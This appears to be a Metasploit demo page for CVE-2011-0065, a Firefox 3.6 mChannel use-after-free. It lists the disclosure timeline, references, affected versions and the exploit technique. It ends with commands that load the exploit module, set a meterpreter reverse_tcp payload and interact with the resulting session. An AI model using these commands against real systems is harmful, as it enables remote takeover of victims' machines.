CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2011-02-17
Coordinated public release of the vulnerability the 2011-04-28
Metasploit PoC provided the 2011-08-10

PoC provided by :

regenrecht
Rh0

Reference(s) :

CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13

Affected version(s) :

Firefox 3.6.17 and bellow
Firefox 3.5.19 and bellow
Seamonkey 2.0.14 and bellow

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig